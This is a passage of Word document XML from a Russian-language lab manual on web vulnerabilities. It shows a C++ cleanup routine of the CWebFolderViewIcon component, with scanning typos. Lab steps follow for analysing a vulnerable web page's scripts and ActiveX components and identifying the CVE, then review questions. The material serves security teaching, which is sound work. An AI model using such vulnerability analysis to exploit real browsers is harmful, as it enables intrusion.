        <w:t>CWebFolderViewIcon::_ClearAinbientFont</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="206"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">(void) </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="208"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">{ </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="205"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="209"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">(pAmbient </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="200"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">== </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="204"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">NULL) </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="208"/>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5"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="208"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">(hobject != </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="209"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">NULL) </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="208"/>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8"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>DeleteObject(hobject)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="209"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</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22"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="610"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="640"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w: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20"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">else </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="1912"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>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5"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="208"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">(hobject != </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="209"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">NULL) </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="208"/>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4"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>pAmbient-&gt;ClearClassAndObject</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="209"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">(pAmbient, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="208"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">hobject) </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="203"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</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22"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>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8"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>pAmbient-&gt;ClearClass(pAmbient)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="203"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="208"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">pAinbient </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="200"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="204"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>NULL;</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FF38D0">
        <w:rPr>
          <w:rStyle w:val="530"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w: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0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">hobject = </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="1914"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">NULL; </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="1910"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>return;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="510"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="522"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>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8"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CWebFolderViewIcon:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="209"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="208"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CWebFolderViewIcon</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="206"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">(void) </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="209"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>{ _ClearLabel</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="204"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="203"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>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4"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Clear</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="209"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Anibient</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="204"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Font () </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="209"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>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20"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="2020"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Additional code snipped for brevity</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="610"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="630"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>}</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pStyle w:val="Mt--1b"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="Mt--1b"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Порядок выполнения работы:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="510"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="360"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Откройте веб страницу, содержащую уязвимость, в текстовом редакторе. Найдите все содержащиеся в ней скрипты. Определите язык, на котором написан скрипт. Перечислите создаваемые и вызываемые в нем модули, объекты и </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ActiveX </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>компоненты. Запишите в протокол лабораторной работы краткую характеристику по каждому скрипту.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="510"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="360"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Проведите детальный анализ используемых компонентов, определите их название и назначение. Присутствуют ли среди перечисленных - ко</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>м</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>поненты, содержащие в себе уязвимости? Укажите их.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="510"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="360"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Попытайтесь определить назначение скрипта и его функциональность.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="510"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="360"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Откройте страницу в Интернет браузере. Опишите поведение браузера. Сделайте снимок страницы в Интернет браузере. Сопоставьте предпол</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>гаемое поведение действительному. Сделайте выводы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="510"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="360"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Определите тип уязвимости, укажите ее индекс </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(CVE, MS). </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Найдите информацию о данной уязвимости и проведите ее детальный анализ. Опиш</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>те, где находится данная уязвимость, и каким образом она используется.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="Mt--0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="709"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3. Контрольные вопросы и задания </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>к занятию</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="90"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>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2C1237">
      <w:pPr>
        <w:pStyle w:val="Mt--0"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Какие технологии используются для организации Интернет атак в наши дни?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="Mt--0"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Назовите типы программных уязвимостей.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="001F5D4C" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="Mt--0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="Mt--0"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
